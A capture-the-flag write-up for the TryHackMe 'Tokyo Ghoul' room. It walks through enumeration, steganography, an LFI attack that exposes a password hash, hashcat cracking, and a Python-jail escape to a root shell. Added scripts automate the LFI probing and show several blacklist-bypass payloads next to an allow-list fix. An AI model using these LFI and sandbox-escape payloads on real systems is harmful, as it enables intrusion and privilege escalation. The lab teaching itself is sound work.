Tokyo Ghoul — TryHackMe

This is a write-up for the TryHackMe room “Tokyo Ghoul”. Please find the room here:
The task is to find the user and root flags and, along the way, answer the questions asked. So let’s help Kaneki escape Jason’s room, starting with the enumeration process using Nmap.
Enumeration
NMAP
# Identify the list of services running on the target machine
$ sudo nmap -sS -Pn -T4 -p- 10.10.0.178
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
# Perform further information gathering on the open ports identified above
$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Jan 23 22:26 need_Help?
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.98.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA)
| 256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA)
|_ 256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Tokyo goul
From the scan results we can answer the questions asked in the first section.
HTTP Port 80
Checking port 80 in a browser, the page source behind the link on the main page (“Can you help him escape?”) contains the following comment:
<!-- look don't tell jason but we will help you escape , here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a friend who will help you -->
OK, so let’s check out the FTP server, which has anonymous access enabled.
FTP
Found these three files by walking all the directories accessible over anonymous FTP:
- Aogiri_tree.txt: hints that we are after someone called “Rize”
- need_to_talk: an executable that gives up the key for Rize once fed the right input
- rize_and_kaneki.jpg: holds the other note from Rize
Ran rabin2 -z (radare2’s string extractor) on the need_to_talk executable and found the key, which is the input need_to_talk expects when run:

Ghidra can also be used to analyse this executable; hovering over the values highlighted in the middle pane reveals the same key:

Finally the executable gave us the passphrase for rize_and_kaneki.jpg, from which the hidden file was extracted with steghide:
$ steghide info rize_and_kaneki.jpg
"rize_and_kaneki.jpg":
format: jpeg
capacity: 2.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "yougotme.txt":
size: 377.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf rize_and_kaneki.jpg
Enter passphrase:
wrote extracted data to "yougotme.txt".
$ cat yougotme.txt
haha you are so smart kaneki but can you talk my code
..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..
if you can talk it all right you got my secret directory
This looks like Morse code. Decoding it with CyberChef (Morse, then From Hex, then From Base64):
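The same three-layer decode done programmatically instead of in CyberChef, as an added example that is not part of the original write-up: each Morse pair is one hex byte, the hex decodes to Base64, and the Base64 decodes to the directory name. NOTE is the Morse copied from yougotme.txt above; the layer-peeling loop is generic and stops as soon as a layer no longer decodes to printable text, so it will not overshoot into garbage.

```python
"""Peel the layered note from rize_and_kaneki.jpg: Morse -> hex -> Base64 -> text.

Added example, not part of the original write-up. NOTE is the Morse from
yougotme.txt; everything else is a generic decoder.
"""
import base64
import binascii
import string
from typing import Optional

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# The Morse body of yougotme.txt, one hex byte (two symbols) per line.
NOTE = """
..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..
"""


def morse_to_text(morse: str) -> str:
    """Translate whitespace-separated Morse symbols; an unknown symbol raises KeyError."""
    return "".join(MORSE[sym] for sym in morse.split())


def peel(layer: str) -> Optional[str]:
    """Strip one encoding layer: try hex first, then strict Base64.

    Returns None when neither decoder yields non-empty printable ASCII,
    which is the signal that the plaintext has been reached.
    """
    decoders = (bytes.fromhex, lambda s: base64.b64decode(s, validate=True))
    for decode in decoders:
        try:
            out = decode(layer).decode("ascii")
        except (ValueError, binascii.Error, UnicodeDecodeError):
            continue
        if out and all(ch in string.printable for ch in out):
            return out
    return None


def decode_note(morse: str, max_layers: int = 5) -> list:
    """Return every layer from the Morse translation down to the plaintext."""
    layers = [morse_to_text(morse)]
    while len(layers) <= max_layers:
        nxt = peel(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


if __name__ == "__main__":
    for depth, text in enumerate(decode_note(NOTE)):
        print(f"layer {depth}: {text}")
```

The last line printed is the hidden directory name, which the write-up keeps redacted in the ffuf command below.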

This gives us a directory. Appending it to the main web page URL shows a hint to scan it, so FFUF was used for that:
$ ffuf -u http://10.10.3.63/[REDACTED]/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

        ffuf v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.3.63/[REDACTED]/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 312, Words: 21, Lines: 15]
claim [Status: 301, Size: 325, Words: 20, Lines: 10]
.html [Status: 403, Size: 275, Words: 20, Lines: 10]
.php [Status: 403, Size: 275, Words: 20, Lines: 10]
[Status: 200, Size: 312, Words: 21, Lines: 15]
:: Progress: [882184/882184] :: Job [1/1] :: 1840 req/sec :: Duration: [0:09:05] :: Errors: 0 ::
So let’s browse to the “claim” directory:

Clicking either YES or NO reveals a parameter “view”, which can be checked for a Local File Inclusion vulnerability:

Capture this request in Burp Suite, send it to the Intruder tab and use the following LFI list from SecLists (which ships with Kali by default) as the payload set:
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt

It worked, and the username and password hash for rize are exposed. Put the hash in a file named hash.txt. It starts with $6$, which is sha512crypt; the hashcat example-hashes page gives mode 1800 for that format:

Use the following command to crack the password hash:
hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
The hash is cracked almost instantly, as the password is a very common one :)
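The LFI probe and hash extraction above, scripted, as an added example that is not part of the original write-up: probe() walks traversal depths against a suspected parameter and stops on the first response that contains the root entry of /etc/passwd, and crackable_hashes() pulls every crypt(3) hash out of the returned text and maps its prefix to the hashcat mode, so the -m value is derived rather than looked up by hand. The base URL and parameter name are arguments, SAMPLE is a constructed response body with a fake hash, and probe() makes a network call so it is not exercised offline.

```python
"""Probe a suspected LFI parameter and turn what it returns into hashcat input.

Added example, not part of the original write-up. SAMPLE is a constructed
response body; the hash in it is a placeholder, not a real one.
"""
import re
import urllib.parse
import urllib.request
from typing import Optional

# passwd-style entries: name:hash-or-x:uid:gid:...  Modern systems keep the
# hash in /etc/shadow, but a misconfigured box can carry it in /etc/passwd.
PASSWD_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_-]*):([^:\n]*):", re.MULTILINE)

# crypt(3) prefix -> hashcat mode (-m). Unlisted prefixes are reported as None.
HASHCAT_MODES = {"$1$": 500, "$5$": 7400, "$6$": 1800,
                 "$2a$": 3200, "$2b$": 3200, "$2y$": 3200}


def lfi_candidates(target: str, depth: int = 6) -> list:
    """Traversal payloads for one file, from no traversal up to `depth` levels."""
    return ["../" * n + target.lstrip("/") for n in range(depth + 1)]


def looks_like_passwd(body: str) -> bool:
    """The root entry is the classic marker that /etc/passwd was included."""
    return re.search(r"^root:[^:]*:0:0:", body, re.MULTILINE) is not None


def crackable_hashes(body: str) -> list:
    """Return (user, hash, hashcat_mode) for every crypt hash in the text."""
    found = []
    for user, field in PASSWD_RE.findall(body):
        if not field.startswith("$"):
            continue                      # 'x', '*', '!' ... no hash here
        prefix = "$" + field.split("$")[1] + "$"
        found.append((user, field, HASHCAT_MODES.get(prefix)))
    return found


def hashcat_commands(body: str, hashfile: str = "hash.txt") -> list:
    """One hashcat invocation per mode present, mirroring the command above."""
    modes = {mode for _, _, mode in crackable_hashes(body) if mode is not None}
    return [f"hashcat -m {mode} -a 0 {hashfile} /usr/share/wordlists/rockyou.txt"
            for mode in sorted(modes)]


def probe(base_url: str, param: str, target: str = "/etc/passwd") -> Optional[tuple]:
    """Try each traversal depth on `param`; return (payload, body) on the first hit.

    Network call, so not run here. Same idea as the Intruder run above, but
    with an explicit success condition instead of eyeballing response sizes.
    """
    for payload in lfi_candidates(target):
        url = base_url + "?" + urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(url, timeout=10) as resp:
            body = resp.read().decode("utf-8", "replace")
        if looks_like_passwd(body):
            return payload, body
    return None


# Constructed sample of what a vulnerable page might echo back (fake hash).
SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "rize:$6$saltsalt$" + "A" * 86 + ":1000:1000:rize:/home/rize:/bin/bash\n"
)

if __name__ == "__main__":
    for user, digest, mode in crackable_hashes(SAMPLE):
        print(f"{user}: mode {mode}: {digest[:20]}...")
    print("\n".join(hashcat_commands(SAMPLE)))
```

Against a live target the call is `probe("http://10.10.3.63/[REDACTED]/claim/index.php", "view")` with the real path filled in; the returned body is then fed to crackable_hashes() and written to hash.txt.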
User.txt
Now log in to the target over SSH with rize’s username and the cracked password. The user flag is in rize’s home directory:

Root.txt
Now check what rize can run as root on the target using sudo -l:

So rize can run jail.py as root. Let’s have a look at it:
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("===========================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()
We need to break this “jail”: the keywords blacklisted in the for loop stop us from typing the Python that would give us a root shell directly, and we cannot edit the file as we don’t have permission to. Found a lot of techniques here for bypassing Python sandboxes, and the Python builtins proved very useful. The check is a plain substring match on the input text, so names built at runtime (e.g. 'OS'.lower() evaluates to os only after the filter has run) never trip it. The following was used as input to the jail.py script:
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
And ran this to get the root shell:
sudo /usr/bin/python3 /home/kamishiro/jail.py
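Why the blacklist fails, shown in code, as an added example that is not part of the original write-up or the room’s jail.py. The block reproduces the jail’s substring filter and exec() call in a fresh namespace, runs the write-up’s payload plus two more ways of spelling the same import without any blocked substring, and contrasts it with an allow-list (ast.literal_eval) that rejects all three before anything executes. Each payload stores os.getpid() instead of spawning /bin/bash so the demonstration is harmless; BLOCKED is the list from jail.py, everything else is this example’s own.

```python
"""Why jail.py's substring blacklist is bypassable, and what a positive rule looks like.

Added example, not part of the original write-up. BLOCKED is copied from
jail.py; PAYLOADS and the helper functions are this example's own.
"""
import ast
import builtins
import os

BLOCKED = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']


def passes_blacklist(text: str) -> bool:
    """jail.py's check: reject if any blocked word appears as a substring."""
    return not any(keyword in text for keyword in BLOCKED)


def run_jailed(text: str) -> dict:
    """Execute `text` the way jail.py does, but in a throwaway namespace.

    __builtins__ is bound to the builtins *module* (as it is in a script run
    as __main__), so `__builtins__.__dict__` resolves exactly as on the target.
    The namespace is returned so callers can inspect what the payload did.
    """
    if not passes_blacklist(text):
        raise PermissionError("blocked by keyword filter")
    namespace = {"__builtins__": builtins}
    exec(text, namespace)
    return namespace


# Three spellings of `import os` that contain none of the blocked substrings.
# Each stores os.getpid() in `r` instead of spawning a shell.
PAYLOADS = {
    # the write-up's trick: uppercase literals lowered at runtime
    "lower()": "r = __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).getpid()",
    # concatenation splits every blocked word across two literals
    "concat": "r = getattr(__builtins__, '__imp' + 'ort__')('o' + 's').getpid()",
    # chr() builds the names from code points; the words never appear at all
    "chr()": ("r = __builtins__.__dict__[''.join(map(chr, "
              "[95,95,105,109,112,111,114,116,95,95]))](chr(111)+chr(115)).getpid()"),
}


def demo() -> dict:
    """Run every payload through the jail; True means it reached os.getpid()."""
    return {name: run_jailed(text)["r"] == os.getpid()
            for name, text in PAYLOADS.items()}


def allow_literal_only(text: str):
    """A positive rule instead of a blacklist: accept only a Python literal.

    ast.literal_eval never calls functions, resolves attributes or imports,
    so the namespace tricks above cannot reach `os` at all. Anything that is
    not a literal is rejected before any code runs.
    """
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError) as exc:
        raise PermissionError(f"not a literal: {exc}") from None


def rejected_by_allowlist(text: str) -> bool:
    """True if the allow-list refuses `text`."""
    try:
        allow_literal_only(text)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    for name, text in PAYLOADS.items():
        print(f"{name:8} blacklist lets it through: {passes_blacklist(text)}  "
              f"allow-list rejects it: {rejected_by_allowlist(text)}")
    print("all payloads executed under the jail:", all(demo().values()))
```

The lesson generalises beyond this room: a substring blacklist on source text is checking the spelling of a program, not its behaviour, and Python offers endless respellings (getattr, string building, chr(), __subclasses__() walks). If untrusted input must be accepted, decide what it is allowed to be (here, a literal) rather than what it must not contain; if it must be executable, do not run it as the privileged user at all.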

Hope you enjoyed reading this as much as I enjoyed solving the challenge, especially the Python jail break, which taught me something new. Thanks for reading and have a nice day!